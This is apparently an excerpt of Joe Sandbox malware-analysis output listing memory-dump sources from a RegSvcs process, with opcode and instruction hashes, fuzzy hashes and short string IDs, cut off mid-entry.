                                                              • Instruction ID: 597875e42353297bc8968abe2adce3266a192b0b2bee7fe84053e1f7fb0683e4
                                                              • Opcode Fuzzy Hash: 146eb736aff82789bbcf8fc633e7b9e629488f14245bb5ffd153b9b54926de8e
                                                              • Instruction Fuzzy Hash: 4202B0B4E002188FDB58CF69C994B9DBBB2FF89300F1081A9D519AB364DB759E85CF10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xbq$$^q
                                                              • API String ID: 0-1593437937
                                                              • Opcode ID: 298b6d8d5d3d9009dbbf8ec41ccea3c641778532af73bd4ad078bea6af8216c4
                                                              • Instruction ID: 7088df0f53107853c043466b4ef4040e5545214fdf521ced99300c672f0f5968
                                                              • Opcode Fuzzy Hash: 298b6d8d5d3d9009dbbf8ec41ccea3c641778532af73bd4ad078bea6af8216c4
                                                              • Instruction Fuzzy Hash: 8F918470B002589BDB18DF789C5427EBBB6BFC4711B0A891DE54BE7388DE358802D796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .5vq
                                                              • API String ID: 0-493797296
                                                              • Opcode ID: 67148e11f1a746ca7ce4ba83407d2d4af54ff2b22d8df7f2c06a31f2539e125b
                                                              • Instruction ID: 3cf4ab22c8622ce4f1ec6b48cb1a9494b0e9db710e815f480d19b8e4dcc18d6b
                                                              • Opcode Fuzzy Hash: 67148e11f1a746ca7ce4ba83407d2d4af54ff2b22d8df7f2c06a31f2539e125b
                                                              • Instruction Fuzzy Hash: C752AC74E01229CFDB64DF69C984B9DBBB2BB89300F1085E9D409AB254DB35AEC5CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: b8432c34499a10f5d41d454583aa8b8d5534f4b7b84a14660e81e243bbc7aac3
                                                              • Instruction ID: 2ea1da5b2312953e2e99459e46686185f64a4471a9783bf9fb3e8a51e2ad970a
                                                              • Opcode Fuzzy Hash: b8432c34499a10f5d41d454583aa8b8d5534f4b7b84a14660e81e243bbc7aac3
                                                              • Instruction Fuzzy Hash: 95F10870D002588BEB15CFA9D88479DBFB2BF88314F28D169E808AB399D7759985CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hbq
                                                              • API String ID: 0-1245868
                                                              • Opcode ID: a5ba9a496bb35fe00560431bb92260bded3612a4ae85e06d74c85b86cb106b67
                                                              • Instruction ID: d52414673d34433d3cb1bcba3486484a550faa0e9f732a77f40bf52827a1e24c
                                                              • Opcode Fuzzy Hash: a5ba9a496bb35fe00560431bb92260bded3612a4ae85e06d74c85b86cb106b67
                                                              • Instruction Fuzzy Hash: A6E10574E00218CFDB54EFA9C944BADBBB2FB48304F2081A9D509AB365DB35AD85CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .5vq
                                                              • API String ID: 0-493797296
                                                              • Opcode ID: ec86fff29ad8b0c0a02d031e44b1171075cc100d1b86c8abb20c971b13692802
                                                              • Instruction ID: 54cec9c01f52041cd86519fc2940ba69ec9eb8a5164b5cafc363904b7d7d3ae7
                                                              • Opcode Fuzzy Hash: ec86fff29ad8b0c0a02d031e44b1171075cc100d1b86c8abb20c971b13692802
                                                              • Instruction Fuzzy Hash: A561E674E0021ACBDB28DF66D940BADB7B2FB88300F10C5A9D41967364DB355D85DF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: t
                                                              • API String ID: 0-2238339752
                                                              • Opcode ID: aa1cbb9fb84930802b991c2053c6c6bb482f8ac0f4aa413ec9e18e283a838be3
                                                              • Instruction ID: f7c34a6f668a53c89c33ccab92c7a4fff5ad774095a89667dc30b2b1d866d434
                                                              • Opcode Fuzzy Hash: aa1cbb9fb84930802b991c2053c6c6bb482f8ac0f4aa413ec9e18e283a838be3
                                                              • Instruction Fuzzy Hash: 744125B4D05248CFDB08CFAAD8406ADFBF2AF88300F20C16AC419BB264DB345949CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fe32914c3f8244218b7a61aa7738befe0b296f6553022a48be3998b63578577
                                                              • Instruction ID: 782c0f29ee9d20af0592f1f611b36ca3c3c0aeeaa698624581864721568adedc
                                                              • Opcode Fuzzy Hash: 2fe32914c3f8244218b7a61aa7738befe0b296f6553022a48be3998b63578577
                                                              • Instruction Fuzzy Hash: 6372DE74E052288FDB64DF69C980BEABBB2BB49300F1491E9D509A7351DB34AEC5CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d851fca2d2a56790b1f69b2d642d0466a00f5f8c37a6e3b85b57620815088be
                                                              • Instruction ID: bb6d98b47b3463f3c209f74c7ac0518f483cadf522a166b1e0e12cdf3a84cffa
                                                              • Opcode Fuzzy Hash: 3d851fca2d2a56790b1f69b2d642d0466a00f5f8c37a6e3b85b57620815088be
                                                              • Instruction Fuzzy Hash: B5F170B1900706CFE728CF24EC482997BB1FB85314F51A799D1526F2D8E7746466CF84
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c407c1d15a27e3160822dc69c29ae1a293402e4302a3dbf7abe4f3b347f170fe
                                                              • Instruction ID: 0357aaf4c8c50495e70ae0f2cec7842de8c4ddf8b3f8029811f233f4d8fb72f1
                                                              • Opcode Fuzzy Hash: c407c1d15a27e3160822dc69c29ae1a293402e4302a3dbf7abe4f3b347f170fe
                                                              • Instruction Fuzzy Hash: 01D15A34A003198FDB54DFA9C848BADBBF1BF54308F159168E41AAF2A5DB74E945CF80
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4841d331ab7481d01ef253db49d9d7fa1ffc6ad3adca997cc221df1ae09d494f
                                                              • Instruction ID: 7401d289fa3fb68c6158351d7116ef35a01628e89cd69230cd22d200fb9553ca
                                                              • Opcode Fuzzy Hash: 4841d331ab7481d01ef253db49d9d7fa1ffc6ad3adca997cc221df1ae09d494f
                                                              • Instruction Fuzzy Hash: 9CD1E274E00218CFDB54DFA9C954BADBBB2EF89300F1484A9D808AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9fb4fd291f63f61820270913b0cacb4e00adfa3fce3494c92028571a87e1d80
                                                              • Instruction ID: 4d7f2c49ab5201f64c50e1fc119022e1097cd3bcd7f4da94aebaab30ddc07058
                                                              • Opcode Fuzzy Hash: b9fb4fd291f63f61820270913b0cacb4e00adfa3fce3494c92028571a87e1d80
                                                              • Instruction Fuzzy Hash: 77C1BF74E00218CFDB54DFA5C994BADBBB2FB88300F1081A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa1863c4b90e4f453284495e41954a5454506fe17a307ef3ce9069d4960e1908
                                                              • Instruction ID: f19e5c3ef8d9d7f79d24257cd6b1049e95a9c152a2dc6d5981179eedbf47a23b
                                                              • Opcode Fuzzy Hash: fa1863c4b90e4f453284495e41954a5454506fe17a307ef3ce9069d4960e1908
                                                              • Instruction Fuzzy Hash: 4FC1AE74E00218CFDB54DFA5C994BADBBB2EF88300F1080A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4596c513c1b5d396e533ee5f482d34a578980011999c8d50defb2520582bedc5
                                                              • Instruction ID: 155515f9f9091cee226b2108825ae341a30066b2e3b88a7ef0a350ee10135a76
                                                              • Opcode Fuzzy Hash: 4596c513c1b5d396e533ee5f482d34a578980011999c8d50defb2520582bedc5
                                                              • Instruction Fuzzy Hash: ACC1BF74E00218CFDB54DFA9C984B9DBBB2EF88300F1080A9D909AB355DB355E85CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6cf3d37d66909e4da493060a88a0a653fa94b0d21687b50c3fa0bf8a8dc52af5
                                                              • Instruction ID: 40002f9c1229b256a7e03e94032c78e3cfb01de165868a1e838a031e6e3e2fa0
                                                              • Opcode Fuzzy Hash: 6cf3d37d66909e4da493060a88a0a653fa94b0d21687b50c3fa0bf8a8dc52af5
                                                              • Instruction Fuzzy Hash: 33C1BE74E00218CFDB54DFA9C994B9DBBB2FB88300F1084A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 047f42cd219cd4bd49e14e15a6b14a48721756f3882f1e7bde95349876684892
                                                              • Instruction ID: 85c0b3be42978d677884c7a59730b1c157692b0fd9dcaa4f83f4571f69216f4f
                                                              • Opcode Fuzzy Hash: 047f42cd219cd4bd49e14e15a6b14a48721756f3882f1e7bde95349876684892
                                                              • Instruction Fuzzy Hash: 50C1BF74E00218CFDB54DFA5C994BADBBB2FB88300F1081A9D909AB365DB359E85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f791e0f7174ce540d08dc91318590f4d7066f5cb7aeb0145854fb80f8cf8ca17
                                                              • Instruction ID: b5d35b57a311f00a007bd359e30bce2b9c91a90169c874e80dd28a581d0909e4
                                                              • Opcode Fuzzy Hash: f791e0f7174ce540d08dc91318590f4d7066f5cb7aeb0145854fb80f8cf8ca17
                                                              • Instruction Fuzzy Hash: 7CC1AF74E00218CFDB54DFA9C994B9DBBB2FB89300F1084A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b83cbeff9e91db91d30318e65ec459180b2c5ff4c0b17775d6a64a93cf854a60
                                                              • Instruction ID: 9ce4005950affec8d18010944908ac78b06fc00053f565a3deb7f4e5d9e73618
                                                              • Opcode Fuzzy Hash: b83cbeff9e91db91d30318e65ec459180b2c5ff4c0b17775d6a64a93cf854a60
                                                              • Instruction Fuzzy Hash: 86C1AF74E00218CFDB54DFA5C994B9DBBB2FB89300F2080A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89f5f187d31321378800c3cd77faacd9757197e71469b4f7597874f2b1f04141
                                                              • Instruction ID: c13a61bad041f3aa3278615550244de09b5a38fc75907efba787e9b5c728a753
                                                              • Opcode Fuzzy Hash: 89f5f187d31321378800c3cd77faacd9757197e71469b4f7597874f2b1f04141
                                                              • Instruction Fuzzy Hash: 20C1AE74E00218CFDB54DFA5C994B9DBBB2EF88300F1081A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92d95561d34df99fbcc3078c773f0c938a71aa1e212d805ccff328b4d3f773be
                                                              • Instruction ID: f4bdc0f8ffdae14550e66fc23ef3f9ac312906fbf36d7a03a30080f81f56adb8
                                                              • Opcode Fuzzy Hash: 92d95561d34df99fbcc3078c773f0c938a71aa1e212d805ccff328b4d3f773be
                                                              • Instruction Fuzzy Hash: CAC1BF74E00218CFDB54DFA9C994B9DBBB2FB88300F1081A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36e8727768c172d87e47d6a266d93001da0051683ffb12a3f3d1066c0a64bf61
                                                              • Instruction ID: 749ff8459793534b17e86fd282332cfaa2cb74b8ab39e8d0bbaf010d0be2f47b
                                                              • Opcode Fuzzy Hash: 36e8727768c172d87e47d6a266d93001da0051683ffb12a3f3d1066c0a64bf61
                                                              • Instruction Fuzzy Hash: CAC1AE74E00218CFDB54DFA5C994BADBBB2EB88300F1081A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58468e9aa3a8f7765c4ec8e67591d5805209ce81293268cb817ddacb960eec48
                                                              • Instruction ID: 24b49a12fce250f763d0c96aea688aca657b4452ac89e5463362c819e4d4e69f
                                                              • Opcode Fuzzy Hash: 58468e9aa3a8f7765c4ec8e67591d5805209ce81293268cb817ddacb960eec48
                                                              • Instruction Fuzzy Hash: 6DC1AE74E00218CFDB54DFA9C994BADBBB2BF88300F1084A9D909AB355DB359E85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ede233878d906535dd267cdd9ce41145ded9eb45eeb4173ee552961af7b9cce
                                                              • Instruction ID: a7a5e6f8cb02edb2a596d62df69d57ab48e4103f61a1dc86a39fae0042e1230c
                                                              • Opcode Fuzzy Hash: 6ede233878d906535dd267cdd9ce41145ded9eb45eeb4173ee552961af7b9cce
                                                              • Instruction Fuzzy Hash: 85C1C174E00218CFDB54DFA9C984B9DBBB2EF88300F1080A9D918AB365DB355E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e6dd4ac7d4f16496049815dee15005f7b32ac91001967634622f916b4e6ef89
                                                              • Instruction ID: 6f4918776b1f7916986bd9aedf32969296d33fa9db39716220d163a601c57eeb
                                                              • Opcode Fuzzy Hash: 8e6dd4ac7d4f16496049815dee15005f7b32ac91001967634622f916b4e6ef89
                                                              • Instruction Fuzzy Hash: 22A18F32E003698FCF55DFB4C84889EBBB6FF85300B15956AE812AB211DB31D945CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcf5ab77ce276c94cc3ba7eace3df7c92784683e19fadf1cceb384c314fb2a9f
                                                              • Instruction ID: ba85fccfa65305fbbe1c3ca929effa1bb55715c4c2d978e00dc08e1f379dda1d
                                                              • Opcode Fuzzy Hash: dcf5ab77ce276c94cc3ba7eace3df7c92784683e19fadf1cceb384c314fb2a9f
                                                              • Instruction Fuzzy Hash: BEA11471D016598FDB10DFA9C884ADDFBB1FF89300F14C6AAE408A7265EB709A85CF41
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e465316e9cab76121e1b15bea5bad7bbcfac3752ca627f8fbde3b557a1520e3
                                                              • Instruction ID: 47aded0f6fc7beb5fb1b59d59565b1abe639c3f7a5955e9f530138d260a102d2
                                                              • Opcode Fuzzy Hash: 8e465316e9cab76121e1b15bea5bad7bbcfac3752ca627f8fbde3b557a1520e3
                                                              • Instruction Fuzzy Hash: A6A19F74E012288FEB28CF6AD944B9DFAF2BB89300F14D1EAD509A7255DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0282ab9566259ede527a3b7ceddffde202687e9c290b3ef4addd578ded403f3c
                                                              • Instruction ID: 82d80a68a56fa51c50860051d29d777ec597b0af8327c38d11d083c3eaff37af
                                                              • Opcode Fuzzy Hash: 0282ab9566259ede527a3b7ceddffde202687e9c290b3ef4addd578ded403f3c
                                                              • Instruction Fuzzy Hash: CAA19174E012188FEB68CF6AD944B9DFBF2BF89300F14D0AAD509A7255DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f2cdf498e9364ceafa452ec702381ee104228e2a447f5c75551dd4d2f24392d
                                                              • Instruction ID: d507c05a4a383006b8e139ef29ff9645e4f245cd5a8bc2817a46f37590752b54
                                                              • Opcode Fuzzy Hash: 8f2cdf498e9364ceafa452ec702381ee104228e2a447f5c75551dd4d2f24392d
                                                              • Instruction Fuzzy Hash: 6C71B375D05218CFDB68CF66C9846DDBBB2BF89301F1481EAD509A7264DB346E85CF00
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2f32af9cc11fa5a410e6d4afda803a26b1e7e3561c02e5a41b9d2a0cdaf052e
                                                              • Instruction ID: d2ed1c8fb96ca3cd965896f861388648913bb15083004b0da4b80491c4556169
                                                              • Opcode Fuzzy Hash: d2f32af9cc11fa5a410e6d4afda803a26b1e7e3561c02e5a41b9d2a0cdaf052e
                                                              • Instruction Fuzzy Hash: 2B7172B1E016188FEB68CF6AC944B99FBF2AF88300F14C4AAD50DA7254DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78404e0bbeb48845818ffafa236028a4f43639c72fcdeab8616d4674ddb3b90f
                                                              • Instruction ID: 0e104c87856f4839025e7dac64ed5a9dfa3d5806b606439becefb3cdabb16d26
                                                              • Opcode Fuzzy Hash: 78404e0bbeb48845818ffafa236028a4f43639c72fcdeab8616d4674ddb3b90f
                                                              • Instruction Fuzzy Hash: F5415C71D0524C8FDB05DFB6C85469DFBB2AF89300F14C0AAC409BB2A6DB345945CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89944b3685cbaa68493e09bda424f29d07290ef329ff946008e769be58ae0a8b
                                                              • Instruction ID: ed8feab63e72a4207a3c12d8105b09a9656151d0d03a8bc815f91fb058de8e70
                                                              • Opcode Fuzzy Hash: 89944b3685cbaa68493e09bda424f29d07290ef329ff946008e769be58ae0a8b
                                                              • Instruction Fuzzy Hash: 3241F5B1D012589BEB19CFAAD8843DEBBF2BF88314F14C129E418AB298DB754545CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d04e5c214be1ed66c6a383479e2d1e695bf1c8d22cf39c765d5621419056f31
                                                              • Instruction ID: 37d33f1e698cab4fd3458d1bc070f31191cbd72db62945e69cdd0b30d5e9499b
                                                              • Opcode Fuzzy Hash: 7d04e5c214be1ed66c6a383479e2d1e695bf1c8d22cf39c765d5621419056f31
                                                              • Instruction Fuzzy Hash: 8A4126B5E01248CFDB18CFAAD9506EEFBB2AF89300F24C56AC414BB255DB34594ACF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 951214cc24b61998a28d02843d4ec3f49153039c74f338de1eba4da886d6f543
                                                              • Instruction ID: 1656ce63652ba356c2aa9cc4ab14d678e04d0027acb42507071d2c31a9e73238
                                                              • Opcode Fuzzy Hash: 951214cc24b61998a28d02843d4ec3f49153039c74f338de1eba4da886d6f543
                                                              • Instruction Fuzzy Hash: 9E4138B1D05248CFDB18DFAAD8446DEBBF2AF89300F24C16AC415BB266DB345949CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bbcdc02c26961cf160e01d68bf8fae2dd5668f916a776382c0cd4c46a407d92
                                                              • Instruction ID: 4b4ca2b3ef7f62bc07a1c576e65307f7211be2f6da74d5facca1aa24eff47435
                                                              • Opcode Fuzzy Hash: 6bbcdc02c26961cf160e01d68bf8fae2dd5668f916a776382c0cd4c46a407d92
                                                              • Instruction Fuzzy Hash: A0410474E01248CBDB18DFAAD9506ADFBF2BF89300F20D16AC518BB255DB34594ACF10
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3359a9c54f53c600e13632af07a6bbed017a2581d4786fa94e07229e3de2f3eb
                                                              • Instruction ID: f681c9bdfed1db99c23905fd8c11b2c7fe1ad02800cf9cc288c51ab471841c45
                                                              • Opcode Fuzzy Hash: 3359a9c54f53c600e13632af07a6bbed017a2581d4786fa94e07229e3de2f3eb
                                                              • Instruction Fuzzy Hash: 6A4169B1E016188BEB58CF6BD9457CAFAF3AFC9304F04C1AAC50CA6255EB741A858F51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f4d34249ded447cc0d10dca816720ba74e97815dab4263428879e7c26cb3083
